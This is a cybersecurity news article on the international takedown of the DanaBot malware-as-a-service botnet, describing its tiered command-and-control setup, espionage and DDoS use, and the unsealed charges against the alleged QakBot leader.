Example of typical Danabot infrastructure "DanaBot initially targeted victims in Ukraine, Poland, Italy, Germany, Austria, and Australia prior to expanding its targeting posture to include U.S.- and Canada-based financial institutions in October 2018," CrowdStrike said. "The malware's popularity grew due to its early modular development supporting Zeus-based web injects, information stealer capabilities, keystroke logging, screen recording, and hidden virtual network computing (HVNC) functionality." According to Black Lotus Labs and Team Cymru, DanaBot employs a layered communications infrastructure between a victim and the botnet controllers, wherein the C2 traffic is proxied through two or three server tiers before it reaches the final level. At least five to six tier-2 servers were active at any given time. A majority of DanaBot victims are concentrated around Brazil, Mexico, and the United States. "The operators have shown their commitment to their craft, adapted to detection and changes in enterprise defense, and with later iterations, insulating the C2s in tiers to obfuscate tracking," the companies said. "Throughout this time, they have made the bot more user-friendly with structured pricing and customer support." High-level diagram of multi-tiered C2 architecture The DoJ said DanaBot administrators operated a second version of the botnet that was specially designed to target victim computers in military, diplomatic, government, and related entities in North America and Europe. This variant, emerging in January 2021, came fitted with capabilities to record all interactions happening on a victim device and send the data to a different server. "Pervasive malware like DanaBot harms hundreds of thousands of victims around the world, including sensitive military, diplomatic, and government entities, and causes many millions of dollars in losses," said United States Attorney Bill Essayli for the Central District of California. The DoJ further credited several private sector firms, Amazon, CrowdStrike, ESET, Flashpoint, Google, Intel 471, Lumen, PayPal, Proofpoint, Spycloud, Team Cymru, and Zscaler, for providing "valuable assistance." Some of the noteworthy aspects of DanaBot, compiled from various reports, are below - DanaBot's sub-botnet 5 received commands to download a Delphi-based executable leveraged to conduct HTTP-based distributed denial-of-service (DDoS) attacks against the Ukrainian Ministry of Defence (MOD) webmail server and the National Security and Defense Council (NSDC) of Ukraine in March 2022, shortly after Russia's invasion of the country Two DanaBot sub-botnets, 24 and 25, were specifically used for espionage purposes likely with an aim to further intelligence-gathering activities on behalf of Russian government interests DanaBot operators have periodically restructured their offering since 2022 to focus on defense evasion, with at least 85 distinct build numbers identified to date (The most recent version is 4006, which was compiled in March 2025) The malware's infrastructure consists of multiple components: A "bot" that infects target systems and performs data collection, an "OnlineServer" that manages the RAT functionalities, a "client" for processing collected logs and bot management, and a "server" that handles bot generation, packing, and C2 communication DanaBot has been used in targeted espionage attacks against government officials in the Middle East and Eastern Europe The authors of DanaBot operate as a single group, offering the malware for rent to potential affiliates, who subsequently use it for their own malicious purposes by establishing and managing their own botnets using private servers DanaBot's developers have partnered with the authors of several malware cryptors and loaders, such as Matanbuchus, and offered special pricing for distribution bundles DanaBot maintained an average of 150 active tier-1 C2 servers per day, with approximately 1,000 daily victims across more than 40 countries, making it one of the largest MaaS platforms active in 2025 Proofpoint, which first identified and named DanaBot in May 2018, said the disruption of the MaaS operation is a win for defenders and that it will have an impact on the cybercriminal threat landscape. "Cybercriminal disruptions and law enforcement actions not only impair malware functionality and use but also impose a cost to threat actors by forcing them to change their tactics, cause mistrust in the criminal ecosystem, and potentially make criminals think about finding a different career," Selena Larson, a staff threat researcher at Proofpoint, said. "These successes against cyber criminals only come about when business IT teams and security service providers share much-needed insight into the biggest threats to society, affecting the greatest number of people around the world, which law enforcement can use to track down the servers, infrastructure, and criminal organizations behind the attacks. Private and public sector collaboration is crucial to knowing how actors operate and taking action against them." DanaBot's features as promoted on its support site DoJ Unseals Charges Against QakBot Leader The development comes as the DoJ unsealed charges against a 48-year-old Moscow resident, Rustam Rafailevich Gallyamo, for leading efforts to develop and maintain the QakBot malware, which was disrupted in a multinational operation in August 2023. The agency also filed a civil forfeiture complaint against over $24 million in cryptocurrency seized from Gallyamov over the course of the investigation. "Gallyamov developed, deployed, and controlled the Qakbot malware beginning in 2008," the DoJ said. "From 2019 onward, Gallyamov allegedly used the Qakbot malware to infect thousands of victim computers around the world in order to establish a network, or 'botnet,' of infected computers." The DoJ revealed that, following the takedown, Gallyamov and his co-conspirators continued their criminal activities by switching to other tactics like "spam bomb" attacks in order to gain unauthorized access to victim networks and deploy ransomware families like Black Basta and CACTUS. Court documents accuse the e-crime group of engaging in these methods as recently as January 2025. "Mr. Gallyamov's bot network was crippled by the talented men and women of the FBI and our international partners in 2023, but he brazenly continued to deploy alternative methods to make his malware available to criminal cyber gangs conducting ransomware attacks against innocent victims globally," said Assistant Director in Charge Akil Davis of the FBI's Los Angeles Field Office. Found this article interesting? Follow us on Twitter  and LinkedIn to read more exclusive content we post.
    0 Комментарии 0 Поделились 0 предпросмотр
Расширенные страницы
CGShares https://cgshares.com